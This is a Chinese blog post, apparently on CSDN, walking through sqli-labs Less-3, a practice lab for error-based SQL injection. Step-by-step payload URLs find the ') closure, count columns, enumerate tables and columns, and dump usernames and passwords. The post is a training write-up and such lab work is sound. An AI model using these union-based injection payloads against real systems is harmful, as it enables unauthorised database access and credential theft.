sqli - labs - 3

已于 2022-07-06 14:58:53 修改
阅读量161 收藏
点赞数 1
文章标签: sql
于 2022-07-02 09:45:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62102000/article/details/125569088
版权

Less-3 GET-Error based- Single quotes with twust string

判断页面是否存在回显

输入id=1出现用户名

加上单引号发现报错

http://192.168.167.32/sqli2/Less-3/?id=1'

存在回显 ''1'') LIMIT 0,1  ,可以判断闭合为: ')

输入:?id=1') and 1=1 --+

http://192.168.167.32/sqli2/Less-3/?id=1') and 1=1 --+

正确显示

输入:?id=1') and 1=2 --+ 

http://192.168.167.32/sqli2/Less-3/?id=1') and 1=2 --+

错误显示

可以判断此处存在SQL注入漏洞

使用order by确定字段数

http://192.168.167.32/sqli2/Less-3/?id=1') order by 3 --+ 

 http://192.168.167.32/sqli2/Less-3/?id=1') order by 4 --+ 

输入3显示正常,输入4报错,则判断数据库中字段为3

联合查询:?id=-1') union select 1,2,3 --+

http://192.168.167.32/sqli2/Less-3/?id=-1') union select 1,2,3 --+

通过回显的位置构造语句查询数据库版本与名称:?id=-1') union select 1,database(),version() --+

构造语句爆出表名:?id=-1') union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema='security' --+

 

构造语句爆出字段名:?id=-1') union select 1,group_concat(column_name) ,3 from information_schema.columns where   table_name='users' and table_schema='security'  --+

爆出用户名和密码:?id=-1') union select 1,group_concat(concat_ws(':',username,password)) ,3 from users --+

完成. 

呼呼个个
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-3
m0_63190830的博客
07-09 158
sqli-labs-3
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqlilabs-3
KAKA的博客
07-06 166
题目即为提示: Get类型+基于错误的注入+单引号+括号+string 可大概猜测开发者所使用的代码是: SELECT LOGIN_NAME,PASSWPRD,FROM TABLE WHERE ID = ('OUR INPUT HERE') 直接构造,不报错,去掉–+报错: http://sqlilabs/Less-3/?id=-1')--+ 接下来又是常规操作: http://sqlilabs/Less-3/?id=1') order by 3--+ http://sqlilabs/Less-3/?i
sqli-labs(3)
jimggg的博客
03-17 173
')闭合 上来就拿sqlmap先跑一下,看一下注入点,懂得源理后我觉得跟自己手动单双引号测试是一样的哈,上图 ‘)闭合,盲注先放着哈,先易后难! http://192.168.1.21/sqli-labs-master/Less-3/?id=1’) and 1=2–+ 后面跟第一题思路一样了,我就不上图了,该偷的懒一定要偷的 列查询order by,发现是3, http://192.168.1.2...
SQL注入之sqli-labs(三)
m0_60716947的博客
04-17 1955
(一)第十一关至第十五关(持续更新中) (1)第十一关 首先依旧是先加两行代码,便于学习
sqlilabs-3 (闯关笔记)
qq_52642385的博客
04-23 2470
在这之前先观察在mysql数据库上执行一条如下指令: 紧接着: 截至到目前我们发现,这个id已经有了三种形式,整数型/ ‘’/ (‘’) 我们可以根据这个特性来构造相应的payload ①:直接?id=’会爆出提示 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use n...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
sqlilabs_3
ZERO_zero_0的博客
07-05 130
sqlilabs_3
sqli-labs Lesson-2详细过程
Brad_的博客
10-16 528
sqli labs 3
Xiaoxiaoqiang_的博客
03-01 177
小学生
sqli-lab 3(冲关记录)
qq_55777983的博客
06-19 104
sqli-lab 3 今天诸事不顺,还下雨,个人很讨厌下雨天 但是今天一个人占领了机房 洞天福地还不趁机速速修炼 赶紧冲了今日的sqli-lab 3 less-3 发现报错 单注入一个单引号看看报错信息 我们可以看到后面多了一个括号,所以我们猜测他的id字段在’ ‘之外又加了一对括号 变成了id=(’’) LIMIT 0,1 注入1’后变成了 id=(‘1’’) LIMIT 0,1 注入1’ --+就变成了 id=(‘1’ --+’) LIMIT 0,1 后面的被注释后我们发现前面的’虽然被注入的’进
sqli-labs—————Less-3
Fly_鹏程万里
05-08 1631
Less-3根据提示传入参数id,数据类型为numeric老样子,用单引号测试报错的内容为:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at...
sqli-labs less-3
dust_hk的博客
01-22 896
解题笔记 今天开始练习手工注入,拿sqli labs做靶机 less1,less2很轻松的就可以通过,在做到less3的时候遇到点瓶颈 首先,判断sql注入类型为字符型 输入 and 1=1 和and 1=2 回显页面相同,所以排除整形注入。 输入 ’ and 1=1 – + 和 ’ and 1=2 --+报同样的错,尝试双引号闭合。 双引号闭合后1=1 和1=2 均回显正常页面。所以...
Sqli-Labs之less-3
ISNS的博客
02-05 1089
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
sqli-lab 闯关教程 Less-3
羽路星尘的博客
10-29 242
每天一个注入小实验,过程仅供参考,如有建议或指正欢迎留言,对本文风格的建议也可以留在评论区哟。
SQL注入之sql-labs-Less3~Less37
TenG的博客
12-22 949
前言: 本篇为sql-labs系类第4、5关讲解,由于有些语法第一关已经讲过,所以本篇涉及到前面的知识不会讲解太细,不懂得语句可以参见此系列第一篇,不正确的地方欢迎指正。 关卡: Less-3、Less-4 正文: Less-3: 这里还是让sql语句在浏览器输出(自己在源码里面改,参见第一篇),可以看到sql语句id数值那里和第一关相比多了一对括号,如果我们只在数值后面加一个单引号就注入显然会报错: 注意看输入的sql语句,注释符注释掉了后面的括号,所以注入的时候要在单引号后面加上括号形成闭合,如图:
sqli-labs29
最新发布
04-21
sqli-labs是一个用于学习和实践SQL注入的实验平台,它提供了一系列具有不同难度级别的SQL注入漏洞场景。sqli-labs29是其中的一个具体场景,它主要涉及到基于时间的盲注(Blind Time-Based Injection)。 在sqli-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值